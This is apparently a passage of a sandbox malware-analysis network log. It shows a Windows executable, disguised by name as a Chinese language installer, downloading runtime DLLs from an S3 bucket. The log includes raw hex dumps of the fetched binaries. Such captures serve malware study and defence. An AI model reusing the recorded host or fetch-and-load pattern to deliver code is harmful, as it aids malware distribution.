cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 20 8b 41 20 48 8b d9 85 c0 7e 0c 48 8b 49 18 ff 15 0e 50 04 00 eb 0b 79 09 48 8b 49 Data Ascii: D$@HHT$HHr5HHL$0HHrH'HIH+HHvQqHgHgKOHcHsHcHsHHL$PH3H`_^[HA@3H9tHAXHcHAXHQ@HHHH@SH A H~HIPyHI
2025-03-13 09:50:50 UTC	1749	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 60 8b 41 14 83 e2 17 89 51 10 23 c2 75 06 48 83 c4 60 5b c3 a8 04 74 09 48 8d 1d 54 b3 04 00 eb 14 a8 02 48 8d 1d 61 b3 04 00 48 8d 05 72 b3 04 00 48 0f 44 d8 ba 01 00 00 00 48 8d 4c 24 20 e8 b7 19 00 00 4c 8b c0 48 8d 4c 24 30 48 8b d3 e8 57 d9 ff ff 48 8d 15 58 20 06 00 48 8d 4c 24 30 e8 3c 04 04 00 cc cc cc cc cc cc 40 53 48 83 ec 60 8b 41 14 83 e2 17 89 51 10 23 c2 74 07 45 84 c0 74 12 eb 06 48 83 c4 60 5b c3 33 d2 33 c9 e8 0d 04 04 00 cc a8 04 74 09 48 8d 1d d3 b2 04 00 eb 14 a8 02 48 8d 1d e0 b2 04 00 48 8d 05 f1 b2 04 00 48 0f 44 d8 ba 01 00 00 00 48 8d 4c 24 20 e8 36 19 00 00 4c 8b c0 48 8d 4c 24 30 48 8b d3 e8 d6 d8 ff ff 48 8d 15 d7 1f 06 00 48 8d 4c 24 30 e8 bb 03 04 00 cc cc cc cc cc e9 Data Ascii: @SH`AQ#uH`[tHTHaHrHDHL$ LHL$0HWHX HL$0<@SH`AQ#tEtH`[33tHHHHDHL$ 6LHL$0HHHL$0
2025-03-13 09:50:51 UTC	9000	IN	Data Raw: 24 b0 00 00 00 49 8b c4 49 3b c5 0f 84 de 00 00 00 41 8a 02 3c 80 73 10 44 0f b6 c0 49 8d 42 01 48 89 03 e9 8c 00 00 00 3c c0 0f 82 20 01 00 00 44 0f b6 c0 3c e0 73 0c 41 83 e0 1f 41 b9 01 00 00 00 eb 2d 3c f0 73 0c 41 83 e0 0f 41 b9 02 00 00 00 eb 1d 3c f8 73 0c 41 83 e0 07 41 b9 03 00 00 00 eb 0d 41 83 e0 03 3c fc 45 1b c9 41 83 c1 05 49 8b d7 41 8d 49 01 49 2b d2 48 3b d1 7c 6f 49 ff c2 4c 89 13 41 8a 02 2c 80 3c 3f 0f 87 c4 00 00 00 41 0f b6 0a 41 8b c0 83 e1 3f c1 e0 06 41 ff c9 44 8b c1 44 0b c0 49 ff c2 4c 89 13 45 85 c9 7f d2 40 38 3e 75 13 c6 06 01 41 f6 46 14 04 74 09 41 81 f8 ff fe 00 00 74 4a 45 39 46 10 0f 82 81 00 00 00 49 8b 03 44 89 00 49 83 03 04 4c 8b 13 49 8b 03 4d 3b d7 0f 85 19 ff ff ff 49 3b ea 40 0f 94 c7 8b c7 4c 8d 5c 24 50 49 8b Data Ascii: $II;A<sDIBH< D<sAA-<sAA<sAAA<EAIAII+H;\|oILA,<?AA?ADDILE@8>uAFtAtJE9FIDILIM;I;@L\$PI
2025-03-13 09:50:51 UTC	16384	IN	Data Raw: 63 c6 48 01 01 48 85 ff 7e 54 4c 8b 8b 80 00 00 00 4d 85 c9 74 48 4c 8b 43 18 48 8d 43 70 49 39 00 75 27 48 8b 8b 88 00 00 00 48 8b 93 90 00 00 00 49 89 08 2b d1 48 8b 43 38 48 89 08 48 8b 43 50 89 10 4c 8b 8b 80 00 00 00 4c 8b c7 ba 01 00 00 00 49 8b ce ff 15 16 24 04 00 48 2b f8 48 2b ef 48 8b c5 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 8b 7c 24 48 48 83 c4 20 41 5e c3 cc cc 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 56 48 83 ec 20 49 8b d8 4c 8b f2 48 8b f9 49 8b f0 4d 85 c0 7e 6f 48 8b 47 38 48 8b 10 48 85 d2 74 08 48 8b 47 50 8b 08 eb 02 33 c9 48 63 c1 85 c9 7e 2a 48 3b d8 48 8b eb 49 8b ce 48 0f 4d e8 4c 8b c5 e8 a4 d9 03 00 48 8b 47 50 48 2b dd 29 28 48 8b 4f 38 48 63 c5 48 01 01 eb 20 48 8b 07 48 8b cf 48 8b 40 38 ff 15 bf Data Ascii: cHH~TLMtHLCHCpI9u'HHI+HC8HHCPLLI$H+H+HH\$0Hl$8Ht$@H\|$HH A^HHXHhHpHx AVH ILHIM~oHG8HHtHGP3Hc~*H;HIHMLHGPH+)(HO8HcH HHH@8
2025-03-13 09:50:51 UTC	1024	IN	Data Raw: f7 48 8b cf e8 04 15 00 00 49 8b d4 48 8b cf e8 9d 3e 00 00 84 c0 0f 84 52 ff ff ff 44 8b 7c 24 34 44 38 6c 24 31 75 05 40 84 f6 75 04 4c 8b 75 97 45 88 2e 48 8b 55 f7 48 83 fa 10 72 34 48 ff c2 48 8b 4d df 48 8b c1 48 81 fa 00 10 00 00 72 1c 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 76 07 ff 15 75 e3 03 00 cc e8 4f 8a 03 00 41 8b c7 48 8b 4d 0f 48 33 cc e8 e0 89 03 00 48 8b 9c 24 20 01 00 00 48 81 c4 e0 00 00 00 41 5f 41 5e 41 5d 41 5c 5f 5e 5d c3 cc cc cc cc cc 48 8b c4 55 56 57 41 54 41 55 41 56 41 57 48 8d 68 b1 48 81 ec e0 00 00 00 48 c7 45 a7 fe ff ff ff 48 89 58 08 48 8b 05 dc b0 07 00 48 33 c4 48 89 45 0f 4d 8b f9 4c 89 4c 24 40 49 8b f8 4c 8b f2 48 89 55 97 4c 8b 65 7f 4c 89 65 9f 48 8b 75 77 48 8b 46 40 48 8b 58 08 48 89 5d 8f 48 Data Ascii: HIH>RD\|$4D8l$1u@uLuE.HUHr4HHMHHrH'HIH+HHvuOAHMH3H$ HA_A^A]A\_^]HUVWATAUAVAWHhHHEHXHH3HEMLL$@ILHULeLeHuwHF@HXH]H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49702	3.5.237.40	443	1784	C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 09:50:53 UTC	76	OUT	GET /VCRUNTIME140.dll HTTP/1.1 Host: priapic.s3.ap-east-1.amazonaws.com
2025-03-13 09:50:54 UTC	446	IN	HTTP/1.1 200 OK x-amz-id-2: oiZqOKLxnO3625O9ArVGdYhuKq7+K6sRJK/NgEFuWevYespI/oLzlIVWGrGmjLfkNrPr72aesU8gAEKEHYjt3i7oSvnyw/Rs x-amz-request-id: KVQ13FCTN78HYNRX Date: Thu, 13 Mar 2025 09:50:55 GMT Last-Modified: Mon, 17 Feb 2025 12:13:09 GMT ETag: "e9b690fbe5c4b96871214379659dd928" x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Content-Type: binary/octet-stream Content-Length: 119376 Server: AmazonS3 Connection: close
2025-03-13 09:50:54 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c8 4e 0d a3 8c 2f 63 f0 8c 2f 63 f0 8c 2f 63 f0 5f 5d 62 f1 8e 2f 63 f0 85 57 f0 f0 87 2f 63 f0 8c 2f 62 f0 a1 2f 63 f0 8c 2f 63 f0 8d 2f 63 f0 8a ae 60 f1 99 2f 63 f0 8a ae 67 f1 9c 2f 63 f0 8a ae 66 f1 93 2f 63 f0 8a ae 63 f1 8d 2f 63 f0 8a ae 9c f0 8d 2f 63 f0 8a ae 61 f1 8d 2f 63 f0 52 69 63 68 8c 2f 63 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$N/c/c/c_]b/cW/c/b/c/c/c`/cg/cf/cc/c/ca/cRich/c
2025-03-13 09:50:54 UTC	578	IN	Data Raw: 48 89 5c 24 08 57 48 83 ec 20 48 8d 05 47 e8 00 00 48 8b f9 48 89 01 8b da 48 83 c1 08 e8 de 1c 00 00 f6 c3 01 74 0d ba 18 00 00 00 48 8b cf e8 e8 bb 00 00 48 8b 5c 24 30 48 8b c7 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 56 57 41 54 41 55 41 56 41 57 48 83 ec 70 48 8b f9 45 33 ff 44 89 7c 24 20 44 21 bc 24 b0 00 00 00 4c 21 7c 24 28 4c 21 bc 24 c8 00 00 00 e8 c3 21 00 00 4c 8b 68 28 4c 89 6c 24 40 e8 b5 21 00 00 48 8b 40 20 48 89 84 24 c0 00 00 00 48 8b 77 50 48 89 b4 24 b8 00 00 00 48 8b 47 48 48 89 44 24 30 48 8b 5f 40 48 8b 47 30 48 89 44 24 48 4c 8b 77 28 4c 89 74 24 50 48 8b cb e8 ae d4 ff ff e8 71 21 00 00 48 89 70 20 e8 68 21 00 00 48 89 58 28 e8 5f 21 00 00 48 8b 50 20 48 8b 52 28 48 8d 4c 24 60 e8 45 b6 00 00 4c 8b e0 48 Data Ascii: H\$WH HGHHHtHH\$0HH _@SVWATAUAVAWHpHE3D\|$ D!$L!\|$(L!$!Lh(Ll$@!H@ H$HwPH$HGHHD$0H_@HG0HD$HLw(Lt$PHq!Hp h!HX(_!HP HR(HL$`ELH
2025-03-13 09:50:54 UTC	16384	IN	Data Raw: c4 53 56 57 41 54 41 55 41 57 48 81 ec a8 00 00 00 48 8b f9 45 33 e4 44 89 64 24 20 44 21 a4 24 f0 00 00 00 4c 21 64 24 28 4c 21 64 24 40 44 88 60 80 44 21 60 84 44 21 60 88 44 21 60 8c 44 21 60 90 44 21 60 94 e8 bb 1f 00 00 48 8b 40 28 48 89 44 24 38 e8 ad 1f 00 00 48 8b 40 20 48 89 44 24 30 48 8b 77 50 48 89 b4 24 f8 00 00 00 48 8b 5f 40 48 8b 47 30 48 89 44 24 50 4c 8b 7f 28 48 8b 47 48 48 89 44 24 70 48 8b 47 68 48 89 44 24 78 8b 47 78 89 84 24 e8 00 00 00 8b 47 38 89 84 24 e0 00 00 00 48 8b cb e8 91 d2 ff ff e8 54 1f 00 00 48 89 70 20 e8 4b 1f 00 00 48 89 58 28 e8 42 1f 00 00 48 8b 50 20 48 8b 52 28 48 8d 8c 24 88 00 00 00 e8 25 b4 00 00 4c 8b e8 48 89 44 24 48 4c 39 67 58 74 19 c7 84 24 f0 00 00 00 01 00 00 00 e8 0f 1f 00 00 48 8b 48 70 48 89 4c 24 Data Ascii: SVWATAUAWHHE3Dd$ D!$L!d$(L!d$@D`D!`D!`D!`D!`D!`H@(HD$8H@ HD$0HwPH$H_@HG0HD$PL(HGHHD$pHGhHD$xGx$G8$HTHp KHX(BHP HR(H$%LHD$HL9gXt$HHpHL$
2025-03-13 09:50:54 UTC	1024	IN	Data Raw: 0d 41 f5 00 00 83 39 09 74 0a 48 8d 54 24 30 e8 a6 ed ff ff 48 8d 54 24 30 48 8b cb e8 7d ec ff ff 48 39 3d 36 f5 00 00 75 0c 83 63 08 00 48 83 23 00 c6 43 08 02 8a 4b 08 84 c9 0f 84 da fe ff ff eb 27 80 7b 08 01 7f 21 48 83 3b 00 48 8b cb 74 0e 48 8d 15 95 bc 00 00 e8 90 e5 ff ff eb 0a ba 01 00 00 00 e8 94 ea ff ff 48 8b 74 24 68 48 8b c3 48 8b 5c 24 60 48 83 c4 50 5f c3 cc 48 89 5c 24 08 55 48 8b ec 48 83 ec 40 48 8b 05 cc f4 00 00 48 8b d9 80 38 58 0f 84 ef 00 00 00 80 38 5a 0f 84 a9 00 00 00 48 8d 4d e0 e8 4a fe ff ff 8b 4d e8 33 d2 84 c9 0f 85 87 00 00 00 48 8b 05 9a f4 00 00 38 10 74 7c 80 38 40 74 6d 80 38 5a 74 0f 89 53 08 c6 43 08 02 48 89 13 e9 da 00 00 00 48 ff c0 4c 8d 45 f0 48 89 05 6f f4 00 00 8b 05 79 f4 00 00 c1 e8 12 f7 d0 a8 01 74 10 48 Data Ascii: A9tHT$0HT$0H}H9=6ucH#CK'{!H;HtHHt$hHH\$`HP_H\$UHH@HH8X8ZHMJM3H8t\|8@tm8ZtSCHHLEHoytH
2025-03-13 09:50:54 UTC	16384	IN	Data Raw: 4c 89 7d e7 48 8d 4d e7 44 89 7d ef 48 8b d8 e8 06 fa ff ff 4c 8b c3 48 8d 55 07 48 8d 4d e7 e8 76 e7 ff ff 41 b0 5d 48 8d 55 27 48 8d 4d 07 e8 92 e7 ff ff 48 8b d0 48 8d 4d d7 e8 5e e8 ff ff 80 7d df 01 7e 99 4c 39 3f 74 62 f7 47 08 00 08 00 00 74 09 48 8d 55 27 48 8b cf eb 3a b2 28 4c 89 7d e7 48 8d 4d e7 44 89 7d ef e8 aa f9 ff ff 4c 8b c7 48 8d 55 07 48 8d 4d e7 e8 1a e7 ff ff 41 b0 29 48 8d 55 27 48 8d 4d 07 e8 36 e7 ff ff 48 8d 55 17 48 8b c8 4c 8d 45 d7 e8 fa e6 ff ff 48 8b 08 48 89 4d d7 8b 40 08 89 45 df 48 8d 55 d7 48 8d 4d f7 e8 54 32 00 00 8b 4d ff 48 8b 45 f7 0f ba e9 0b 41 89 4e 08 49 89 06 e9 a0 00 00 00 48 8d 4d e7 4c 89 7d e7 44 89 7d ef 4c 39 3a 74 5b b2 28 e8 31 f9 ff ff 4c 8b c7 48 8d 55 d7 48 8d 4d e7 e8 a1 e6 ff ff 48 8d 05 ee b5 00 Data Ascii: L}HMD}HLHUHMvA]HU'HMHHM^}~L9?tbGtHU'H:(L}HMD}LHUHMA)HU'HM6HUHLEHHM@EHUHMT2MHEANIHML}D}L9:t[(1LHUHMH
2025-03-13 09:50:54 UTC	1024	IN	Data Raw: 30 e8 68 a7 ff ff 4c 8b c7 48 8d 55 20 48 8b c8 e8 85 a7 ff ff 48 8b 08 48 89 0f 8b 40 08 89 47 08 4c 8d 9c 24 40 02 00 00 48 8b c7 49 8b 5b 20 49 8b 73 28 49 8b 7b 30 49 8b e3 41 5e 41 5d 5d c3 cc 48 89 5c 24 08 4c 89 74 24 10 55 48 8b ec 48 83 ec 70 48 83 21 00 48 8b d9 83 61 08 00 45 33 c0 48 8d 4d c0 b2 01 e8 15 1b 00 00 4c 8d 35 ea 71 00 00 48 8b 10 48 89 13 48 8b ca 8b 40 08 89 43 08 80 7b 08 00 48 8b 05 d0 b0 00 00 75 59 80 38 00 74 54 80 38 40 74 54 48 8d 4d d0 e8 e7 fa ff ff 4c 89 75 b0 4c 8d 45 c0 c7 45 b8 02 00 00 00 48 8d 55 e0 0f 28 45 b0 48 8b c8 66 0f 7f 45 c0 e8 a7 a6 ff ff 4c 8b c3 48 8d 55 f0 48 8b c8 e8 c4 a6 ff ff 48 8b 08 48 89 0b 8b 40 08 89 43 08 48 8b 05 75 b0 00 00 80 38 40 75 0c 48 ff c0 48 89 05 66 b0 00 00 eb 74 80 38 00 74 0e Data Ascii: 0hLHU HHH@GL$@HI[ Is(I{0IA^A]]H\$Lt$UHHpH!HaE3HML5qHHH@C{HuY8tT8@tTHMLuLEEHU(EHfELHUHHH@CHu8@uHHft8t
2025-03-13 09:50:54 UTC	1749	IN	Data Raw: ad 00 00 83 63 08 00 48 8d 05 e0 74 00 00 48 89 03 eb 27 48 ff c0 48 89 05 41 ad 00 00 48 8b 44 24 20 48 89 03 8b 44 24 28 89 43 08 eb 0c 83 63 08 00 48 83 23 00 c6 43 08 02 48 8b c3 48 83 c4 40 5b c3 cc cc cc 40 53 48 83 ec 30 48 8b d9 48 8b 0d 08 ad 00 00 80 39 00 75 10 83 63 08 00 48 8d 05 88 74 00 00 48 89 03 eb 62 41 b8 04 00 00 00 48 8d 15 6a 6e 00 00 ff 15 c0 5a 00 00 85 c0 75 3f 48 83 05 d4 ac 00 00 04 44 8d 40 01 33 d2 48 8d 4c 24 20 e8 9c fe ff ff 48 8b 05 bd ac 00 00 80 38 40 75 1b 48 ff c0 48 89 05 ae ac 00 00 48 8b 44 24 20 48 89 03 8b 44 24 28 89 43 08 eb 0c 83 63 08 00 48 83 23 00 c6 43 08 02 48 8b c3 48 83 c4 30 5b c3 40 53 48 83 ec 20 48 8b 05 7b ac 00 00 48 8b d9 80 38 3f 75 24 48 ff c0 80 38 24 75 09 b2 01 e8 48 02 00 00 eb 1d 45 33 c0 Data Ascii: cHtH'HHAHD$ HD$(CcH#CHH@[@SH0HH9ucHtHbAHjnZu?HD@3HL$ H8@uHHHD$ HD$(CcH#CHH0[@SH H{H8?u$H8$uHE3
2025-03-13 09:50:54 UTC	9000	IN	Data Raw: 66 0f 7f 45 b0 e8 5f 99 ff ff e9 10 03 00 00 b2 26 4c 89 75 e0 48 8d 4d e0 44 89 75 e8 e8 23 af ff ff 48 8d 4d b0 e8 0a c9 ff ff 4c 8b c0 48 8d 4d e0 48 8b d7 e8 8b 9c ff ff e9 e0 02 00 00 48 8b cf e8 6a f6 ff ff e9 d3 02 00 00 48 8d 05 c6 6d 00 00 44 89 77 08 48 89 07 e9 c0 02 00 00 48 8b cf e8 5a db ff ff e9 b3 02 00 00 8b ce 83 e9 37 74 53 83 e9 01 74 41 83 e9 09 74 2d 83 e9 01 74 28 83 e9 01 74 16 83 f9 02 0f 85 84 02 00 00 48 8b cf e8 9d c8 ff ff e9 82 02 00 00 48 8b cf e8 50 b2 ff ff e9 75 02 00 00 8b d6 48 8b cf e8 61 d3 ff ff e9 66 02 00 00 48 8b cf e8 80 e6 ff ff e9 59 02 00 00 48 8b cf e8 3f 0a 00 00 e9 4c 02 00 00 83 fe 50 0f 8f 18 02 00 00 0f 84 f4 01 00 00 8b ce 83 e9 47 74 50 83 e9 01 74 4b 83 e9 01 74 46 83 e9 01 74 41 83 e9 03 74 1c 83 f9 Data Ascii: fE_&LuHMDu#HMLHMHHjHmDwHHZ7tStAt-t(tHHPuHafHYH?LPGtPtKtFtAt
2025-03-13 09:50:54 UTC	16384	IN	Data Raw: 19 ff 15 22 30 00 00 48 8b 4d 0f 48 33 cc e8 ee 08 00 00 48 81 c4 e0 00 00 00 5d c3 cc 40 55 48 8d 6c 24 e1 48 81 ec e0 00 00 00 48 8b 05 cf 7f 00 00 48 33 c4 48 89 45 0f 4c 8b 55 77 48 8d 05 dd 4a 00 00 0f 10 00 4c 8b d9 48 8d 4c 24 30 0f 10 48 10 0f 11 01 0f 10 40 20 0f 11 49 10 0f 10 48 30 0f 11 41 20 0f 10 40 40 0f 11 49 30 0f 10 48 50 0f 11 41 40 0f 10 40 60 0f 11 49 50 0f 10 88 80 00 00 00 0f 11 41 60 0f 10 40 70 48 8b 80 90 00 00 00 0f 11 41 70 0f 11 89 80 00 00 00 48 89 81 90 00 00 00 48 8d 05 54 4d ff ff 48 89 45 8f 48 8b 45 4f 48 89 45 9f 48 63 45 5f 4c 89 45 af 4c 8b 45 6f 48 89 45 a7 0f b6 45 7f 48 89 45 c7 49 8b 48 18 4d 8b 40 20 49 03 4a 08 4d 03 42 08 48 63 45 67 48 89 45 e7 49 8b 42 40 48 89 44 24 28 49 8b 42 28 4c 89 4d 97 45 33 c9 48 89 Data Ascii: "0HMH3H]@UHl$HHH3HELUwHJLHL$0H@ IH0A @@I0HPA@@`IPA`@pHApHHTMHEHEOHEHcE_LELEoHEEHEIHM@ IJMBHcEgHEIB@HD$(IB(LME3H
2025-03-13 09:50:54 UTC	1024	IN	Data Raw: 63 74 6f 72 27 00 00 00 00 60 76 65 63 74 6f 72 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 60 76 65 63 74 6f 72 20 64 65 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 00 60 76 69 72 74 75 61 6c 20 64 69 73 70 6c 61 63 65 6d 65 6e 74 20 6d 61 70 27 00 00 00 00 00 00 60 65 68 20 76 65 63 74 6f 72 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 00 00 00 00 60 65 68 20 76 65 63 74 6f 72 20 64 65 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 60 65 68 20 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 Data Ascii: ctor'`vector constructor iterator'`vector destructor iterator'`vector vbase constructor iterator'`virtual displacement map'`eh vector constructor iterator'`eh vector destructor iterator'`eh vector vbase constructor iterator'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49703	3.5.237.40	443	1784	C:\Users\user\Desktop\#U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 09:50:56 UTC	78	OUT	GET /vcruntime140_1.dll HTTP/1.1 Host: priapic.s3.ap-east-1.amazonaws.com
2025-03-13 09:50:57 UTC	445	IN	HTTP/1.1 200 OK x-amz-id-2: 3E90HRYnm9Ynv0iNVmKYZTVsEWCb0R4xVLC9FHH8lAUjRu4izNNqgZkJtsuBDdFv7zFTYCvYNOrUgBfwRn/hSOouGZ4WpeYY x-amz-request-id: 843FME5VDMWTD0F3 Date: Thu, 13 Mar 2025 09:50:58 GMT Last-Modified: Mon, 17 Feb 2025 12:13:09 GMT ETag: "eb49c1d33b41eb49dfed58aafa9b9a8f" x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Content-Type: binary/octet-stream Content-Length: 49744 Server: AmazonS3 Connection: close
2025-03-13 09:50:57 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 39 40 b7 57 7d 21 d9 04 7d 21 d9 04 7d 21 d9 04 ae 53 d8 05 7f 21 d9 04 7b a0 d8 05 7f 21 d9 04 74 59 4a 04 76 21 d9 04 7d 21 d8 04 4e 21 d9 04 7b a0 da 05 78 21 d9 04 7b a0 dd 05 7a 21 d9 04 7b a0 dc 05 66 21 d9 04 7b a0 d9 05 7c 21 d9 04 7b a0 26 04 7c 21 d9 04 7b a0 db 05 7c 21 d9 04 52 69 63 68 7d 21 d9 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$9@W}!}!}!S!{!tYJv!}!N!{x!{z!{f!{\|!{&\|!{\|!Rich}!PEd
2025-03-13 09:50:57 UTC	579	IN	Data Raw: d8 72 00 00 00 00 00 00 c4 72 00 00 00 00 00 00 b0 72 00 00 00 00 00 00 92 72 00 00 00 00 00 00 76 72 00 00 00 00 00 00 62 72 00 00 00 00 00 00 4e 72 00 00 00 00 00 00 34 72 00 00 00 00 00 00 1e 72 00 00 00 00 00 00 08 72 00 00 00 00 00 00 ee 71 00 00 00 00 00 00 e0 71 00 00 00 00 00 00 c6 71 00 00 00 00 00 00 b4 71 00 00 00 00 00 00 a2 71 00 00 00 00 00 00 94 71 00 00 00 00 00 00 8a 71 00 00 00 00 00 00 7c 71 00 00 00 00 00 00 6e 71 00 00 00 00 00 00 62 71 00 00 00 00 00 00 3a 71 00 00 00 00 00 00 cc 70 00 00 00 00 00 00 dc 70 00 00 00 00 00 00 ee 70 00 00 00 00 00 00 1a 71 00 00 00 00 00 00 02 71 00 00 00 00 00 00 2a 71 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 70 00 00 00 00 00 00 9a 70 00 00 00 00 00 00 62 70 00 00 00 00 00 00 7a 70 00 00 00 00 00 Data Ascii: rrrrvrbrNr4rrrqqqqqqq\|qnqbq:qpppqq*qppbpzp
2025-03-13 09:50:57 UTC	16384	IN	Data Raw: 6e 6f 77 6e 20 65 78 63 65 70 74 69 6f 6e 00 00 00 00 00 00 00 f8 64 00 80 01 00 00 00 b0 25 00 80 01 00 00 00 50 31 00 80 01 00 00 00 62 61 64 20 65 78 63 65 70 74 69 6f 6e 00 00 00 98 52 00 80 01 00 00 00 d8 52 00 80 01 00 00 00 18 53 00 80 01 00 00 00 61 00 70 00 69 00 2d 00 6d 00 73 00 2d 00 77 00 69 00 6e 00 2d 00 63 00 6f 00 72 00 65 00 2d 00 66 00 69 00 62 00 65 00 72 00 73 00 2d 00 6c 00 31 00 2d 00 31 00 2d 00 31 00 00 00 00 00 00 00 61 00 70 00 69 00 2d 00 6d 00 73 00 2d 00 77 00 69 00 6e 00 2d 00 63 00 6f 00 72 00 65 00 2d 00 73 00 79 00 6e 00 63 00 68 00 2d 00 6c 00 31 00 2d 00 32 00 2d 00 30 00 00 00 00 00 00 00 00 00 6b 00 65 00 72 00 6e 00 65 00 6c 00 33 00 32 00 00 00 00 00 00 00 00 00 61 00 70 00 69 00 2d 00 6d 00 73 00 2d 00 00 00 00 00 Data Ascii: nown exceptiond%P1bad exceptionRRSapi-ms-win-core-fibers-l1-1-1api-ms-win-core-synch-l1-2-0kernel32api-ms-
2025-03-13 09:50:57 UTC	1024	IN	Data Raw: 90 05 d7 e9 a3 9d b2 b0 ff e3 7a 2e 87 76 5f 3b f2 e2 f4 19 c8 11 3b fb 3a 17 cf aa 46 e3 52 84 39 07 85 b8 f5 0d 12 55 6d 05 2c ae 61 1c 28 0e 83 ec 48 c9 30 b9 f2 a1 82 3f cc 30 82 17 90 06 0a 2b 06 01 04 01 82 37 03 03 01 31 82 17 80 30 82 17 7c 06 09 2a 86 48 86 f7 0d 01 07 02 a0 82 17 6d 30 82 17 69 02 01 03 31 0f 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 30 82 01 52 06 0b 2a 86 48 86 f7 0d 01 09 10 01 04 a0 82 01 41 04 82 01 3d 30 82 01 39 02 01 01 06 0a 2b 06 01 04 01 84 59 0a 03 01 30 31 30 0d 06 09 60 86 48 01 65 03 04 02 01 05 00 04 20 e7 03 93 4d 32 1f 2d 95 1f 30 4e 11 8b a0 2d cd 18 c5 2d 56 d1 3e 82 74 a9 a1 4d 70 aa 9c 30 2c 02 06 65 a0 07 e9 a2 c7 18 13 32 30 32 34 30 31 31 39 31 37 34 30 34 30 2e 36 34 39 5a 30 04 80 02 01 f4 a0 81 d1 Data Ascii: z.v_;;:FR9Um,a(H0?0+710\|Hm0i10`He0RHA=09+Y010`He M2-0N--V>tMp0,e20240119174040.649Z0
2025-03-13 09:50:57 UTC	10157	IN	Data Raw: dd 93 c8 e7 3e 50 e9 bb 7b dd ad 54 f1 e9 8d d8 3e 3a 67 f7 d5 32 d4 7f fa 28 bb 20 0e 27 f2 27 9f 68 a1 dc 04 8f d1 06 26 f8 01 50 8e 16 03 34 3b bc bb 33 1d c0 71 79 41 dc 2c b1 c3 5a f4 f5 52 19 e7 4b 74 32 e8 f6 32 fa 0e 83 c5 e0 d6 28 d3 a9 6f bc 44 2e 48 9f 48 9b 06 5f 04 62 f2 ff c8 69 13 b4 43 e1 ec 2f 24 a9 8c d7 eb 7a 79 0b 84 b1 35 e3 ac 63 36 5a 39 16 d7 c4 a0 51 9f 27 f9 5a 4b da e9 3a 02 10 e4 09 ad f9 e4 8e 77 d6 9d 09 92 aa 68 a2 7e dd 1e e2 d4 75 94 90 3b 8d 2a 99 52 10 ea a4 02 6a 7b c8 99 3a a6 36 01 3f ac f2 74 ae 0a f4 84 c3 c8 fe e4 75 4f f8 9a 2f 49 84 ab 86 ea 6a 4f b7 b1 af 08 f8 50 18 38 8f cf 0b b5 7e cc 47 a4 fa c7 72 5a d6 97 fa 77 5b 1a 5b ff 44 96 f9 99 06 86 9f c3 6e 9d b9 1f bc 70 f5 42 de 43 d2 b9 ad 30 e7 a4 60 ca bb 42 Data Ascii: >P{T>:g2( ''h&P4;3qyA,ZRKt22(oD.HH_biC/$zy5c6Z9Q'ZK:wh~u;*Rj{:6?tuO/IjOP8~GrZw[[DnpBC0`B
